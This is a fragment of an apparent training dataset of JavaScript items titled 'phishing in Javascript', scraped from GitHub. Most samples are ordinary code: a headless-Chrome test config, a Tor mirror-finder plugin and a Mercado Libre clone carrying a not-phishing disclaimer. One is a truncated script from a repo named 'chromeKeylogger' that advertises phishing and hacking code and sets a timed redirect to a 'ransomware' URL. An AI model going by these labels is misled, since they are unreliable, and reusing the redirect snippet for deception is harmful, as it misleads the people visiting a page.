"sample_solution":"\/* eslint-env node *\/\nmodule.exports = {\n test_page: 'tests\/index.html?hidepassed',\n disable_watching: true,\n launch_in_ci: [\n 'Chrome',\n ],\n launch_in_dev: [\n 'Chrome',\n ],\n browser_args: {\n Chrome: [\n '--headless',\n '--no-sandbox',\n '--disable-gpu',\n '--disable-software-rasterizer',\n '--mute-audio',\n '--remote-debugging-port=0',\n '--window-size=1440,900',\n\n \/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/v1.11.0\/lib\/Launcher.js#L36\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n '--disable-features=site-per-process',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--disable-translate',\n '--enable-automation',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n ],\n },\n};\n",
"language":"Javascript",
"repo_name":"bitcoin-black-bcb\/bcb-wallet",
"timestamp":"2025-05-22T22:01:03.841591",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/'use strict';\n\nfunction appendMirr(data) {\n\tmirr = JSON.parse(data)[0];\n\tif(mirr.url) {\n\t\tvar altelem = document.createElement(\"h1\");\n\t\taltelem = '<br\/><a style=\"background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;\" href=\"'+mirr.url+'\">Try this working mirror instead<\/a>';\n\t\tvar element = document.getElementById('mainwarn');\n\t\telement.innerHTML += altelem;\n\t}\n}\n\nfunction newMirr(site, success) {\n\tif(site) {\n\t\tgetAjax('https:\/\/onion.live\/api\/v2\/public\/mirrors?site='+site+'&max=1', '', success);\n\t}\n}\n\nfunction handleResponse(message) {\n\tconsole.log(`Message from the background script: ${message.response}`);\n}\n\nfunction handleError(error) {\n\tconsole.log(`Error: ${error}`);\n}\n\nfunction getAjax(url, data, success) {\n\tvar params = typeof data == 'string' ? data : Object.keys(data).map(\n\t\tfunction(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }\n\t).join('&');\n\tvar xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(\"Microsoft.XMLHTTP\");\n\txhr.open('GET', url);\n\txhr.onreadystatechange = function() {\n\t\tif (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }\n\t\tif (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }\n\t};\n\txhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');\n\txhr.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');\n\txhr.send(params);\n\treturn xhr;\n}\n\nfunction checkWorking(url, site) {\n\tvar MrChecker = new XMLHttpRequest(),\n\tCheckThisUrl = \"http:\/\/\"+url+\"\/\";\n\tMrChecker.open('get', CheckThisUrl, true);\n\tMrChecker.onreadystatechange = checkReadyState;\n\tfunction checkReadyState() {\n\t\tif (MrChecker.readyState === 4) {\n\t\t\tif (MrChecker.status >= 200 || MrChecker.status < 304) {\n\t\t\t\tvar element = document.getElementById('mainwarn');\n\t\t\t\tif(element) {\n\t",
"language":"Javascript",
"repo_name":"OnionDotLive\/onionliveplugin",
"timestamp":"2025-05-22T22:01:04.017163",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* \r\n####################################################################\r\n# s'abonner sur ma chaine youtube pour avoir plus de code phishing #\r\n# et hacking,il me donne le courage de faire les codes phishing # \r\n# #\r\n# subscribe on my youtube channel to have more phishing code #\r\n# and hacking, it gives me the courage to do the phishing codes #\r\n# #\r\n# ||~~ BY ~~ hakanonymos ~~|| #\r\n# #\r\n# #\r\n# #\r\n# skype et email : hakanonymos@hotmail.com # \r\n#################################################################### \r\n*\/\r\n\r\n \r\nvar xScroll, yScroll, timerPoll, timerRedirect, timerClock;\r\n \r\nfunction initRedirect(){\r\n if (typeof document.body.scrollTop != \"undefined\"){ \/\/IE,NS7,Moz\r\n xScroll = document.body.scrollLeft;\r\n yScroll = document.body.scrollTop;\r\n \r\n clearInterval(timerPoll); \/\/stop polling scroll move\r\n clearInterval(timerRedirect); \/\/stop timed redirect\r\n \r\n timerPoll = setInterval(\"pollActivity()\",1); \/\/poll scrolling votre site de redrection 10000 = 10 seconde\r\n timerRedirect = setInterval(\"location.href='https:\/\/panafricaine.com\/ransomware\/'\",300 0000); \/\/temps de redirection\r\n \r\n \r\n }\r\n else if (typeof window.pageYOffset != \"undefined\"){ \/\/other browsers that support pageYOffset\/pageXOffset instead\r\n ",
"language":"Javascript",
"repo_name":"hakanonymos\/chromeKeylogger",
"timestamp":"2025-05-22T22:01:04.152105",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import { useEffect, useState } from \"react\";\n\nimport Navbar from \".\/components\/Navbar\/Navbar\";\nimport Breadcrumbs from \".\/components\/Breadcrumbs\/Breadcrumbs\";\nimport ProductDetails from \".\/components\/ProductDetails\/ProductDetails\";\nimport ProductCarousel from \".\/components\/ProductCarousel\/ProductCarousel\";\n\nimport Swal from \"sweetalert2\";\n\nimport \".\/App.css\";\n\nconst App = () => {\n\tconst [darkMode, setDarkMode] = useState(false);\n\n\tconst toggleDarkMode = () => setDarkMode(prevState => !prevState);\n\n\tuseEffect(() => {\n\t\tSwal.fire({\n\t\t\ttitle: \"\u00a1Atenci\u00f3n!\",\n\t\t\ttext: \"Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan.\",\n\t\t\ticon: \"warning\",\n\t\t\tconfirmButtonText: \"\u00a1Entendido!\",\n\t\t\tconfirmButtonColor: \"#3484fa\",\n\t\t\tbackdrop: \"rgba(0, 0, 0, 0.8)\",\n\t\t});\n\t}, []);\n\n\treturn (\n\t\t<>\n\t\t\t<header className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} \/>\n\t\t\t<\/header>\n\n\t\t\t<main className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Breadcrumbs \/>\n\t\t\t\t<ProductDetails \/>\n\t\t\t\t<ProductCarousel \/>\n\t\t\t<\/main>\n\n\t\t\t<footer className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\tDesarrollado por&nbsp;\n\t\t\t\t<a\n\t\t\t\t\thref=\"https:\/\/gastonperez.ar\/\"\n\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t>\n\t\t\t\t\tGast&oacute;n P&eacute;rez\n\t\t\t\t<\/a>\n\t\t\t\t<p>\n\t\t\t\t\tATENCI\u00d3N: Esta web se trata de un&nbsp;\n\t\t\t\t\t<a\n\t\t\t\t\t\thref=\"https:\/\/github.com\/goncy\/mercadolibre-details-challenge\"\n\t\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t\t>\n\t\t\t\t\t\tchallenge\n\t\t\t\t\t<\/a>\n\t\t\t\t\t, no es un intento de phishing hacia los usuarios que la\n\t\t\t\t\tvisitan.\n\t\t\t\t<\/p>\n\t\t\t<\/footer>\n\t\t<\/>\n\t);\n};\n\nexport default App;\n",
"language":"Javascript",
"repo_name":"GastonPerez97\/mercadolibre-details-challenge",
"timestamp":"2025-05-22T22:01:04.271013",
"split":"training"
}
]